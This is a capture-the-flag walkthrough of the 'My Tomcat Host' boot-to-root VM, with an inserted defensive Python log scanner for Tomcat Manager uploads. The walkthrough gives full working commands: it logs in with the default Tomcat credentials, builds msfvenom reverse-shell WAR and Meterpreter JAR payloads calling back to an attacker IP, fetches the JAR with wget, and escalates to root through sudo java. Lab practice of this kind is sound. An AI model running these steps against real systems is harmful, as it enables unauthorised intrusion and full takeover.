Tomcat Host
Welcome to “My Tomcat Host”. This boot-to-root VM is designed for testing your basic enumeration skills and concepts.
Difficulty: Easy/Beginner Level
Author: Akanksha Sachin Verma
Enumeration
Firstly, a netdiscover scan will reveal how the machine can be identified on the network:
netdiscover -i eth1
Then an nmap scan:
nmap -p- -A 192.168.56.110
A closer look at port 8080 in my browser reveals Apache Tomcat/9.0.31.
Apache Tomcat is an application server designed to execute Java servlets and render web pages written with JavaServer Pages (JSP).
The “Manager App” section requires a username and password. The default credentials for Tomcat work (tomcat:tomcat).
192.168.56.110:8080/manager/html
The Web Application Manager is an opportunity to upload a reverse shell. I’ll be using msfvenom to create a reverse shell. This is a good website on how to use msfvenom for reference:
The payload must be a WAR file that connects back to my local address on port 4444.
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f war > fedai.war
This will be uploaded here:
Before executing the payload, listen on port 4444 with netcat:
nc -nvlp 4444
Now it must be executed, so we visit the path where it is kept, in my case /fedai. We now have a reverse shell, and the uid is ‘tomcat’.
id
python -c 'import pty;pty.spawn("/bin/bash")'
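As a defensive counterpart to the Manager-app upload described above, here is an added example (not part of the original write-up) that scans Tomcat access-log lines for a successful deployment through the Manager interface and lists the new context roots the same host requested afterwards. The log lines are constructed samples in Tomcat's default AccessLogValve pattern; the host, user and context names are assumptions.

```python
import re

# Constructed sample lines in Tomcat's default access-log pattern
# ("%h %l %u %t "%r" %s %b"). Not taken from the write-up.
SAMPLE_LOG = """\
192.168.56.101 - - [10/Mar/2020:14:01:58 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.101 - tomcat [10/Mar/2020:14:02:03 +0000] "GET /manager/html HTTP/1.1" 200 17324
192.168.56.101 - tomcat [10/Mar/2020:14:02:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=XYZ HTTP/1.1" 200 17902
192.168.56.101 - - [10/Mar/2020:14:02:20 +0000] "GET /fedai/ HTTP/1.1" 200 0
10.0.0.7 - - [10/Mar/2020:14:05:00 +0000] "GET /docs/ HTTP/1.1" 200 5204
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager endpoints that deploy a new web application: the HTML upload
# form and the text (scripting) interface.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_manager_deployments(log_text):
    """Return one finding per successful deployment through the Manager app.

    A finding carries the source host, the authenticated user, the time and
    the context roots that host requested afterwards (a WAR upload followed
    by a visit to the deployed path is the trace the write-up's steps leave).
    """
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    findings = []
    for i, r in enumerate(records):
        base = r["path"].split("?")[0]
        if r["method"] not in ("POST", "PUT") or base not in DEPLOY_PATHS or r["status"] != "200":
            continue
        followups = sorted({
            s["path"].split("/")[1]
            for s in records[i + 1:]
            if s["host"] == r["host"] and not s["path"].startswith("/manager")
        })
        findings.append({"host": r["host"], "user": r["user"], "time": r["time"], "new_contexts": followups})
    return findings
```

Run against a real access log, a hit on /manager/html/upload from an address that should never reach the Manager app, followed by a request for a context root nobody deployed, is the signal to act on.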
User
Always check sudo privileges to see how we can start escalating privileges:
sudo -l
As shown, the user tomcat can run /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java with sudo. This is an OpenJDK java binary, which we can use to escalate privileges.
We’ll create another reverse shell payload, this time a Meterpreter payload packaged as a JAR file. The listening port will be 5555, again with my local IP address. The file will be downloaded onto the victim’s machine, so it is created under the Apache web directory on my machine.
msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost=192.168.56.101 lport=5555 > fedai.jar
Start the apache2 service:
service apache2 start
Go to the temp directory on the victim’s machine and transfer the payload over.
cd /tmp
wget http://192.168.56.101/fedai.jar
Root
Before executing, we need to set up the Meterpreter payload listener in Metasploit:
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lport 5555
run
Let’s execute this payload with the following command:
sudo java -jar fedai.jar
We get a successful connection from the Tomcat machine, as seen in Meterpreter, and the current user is identified as root!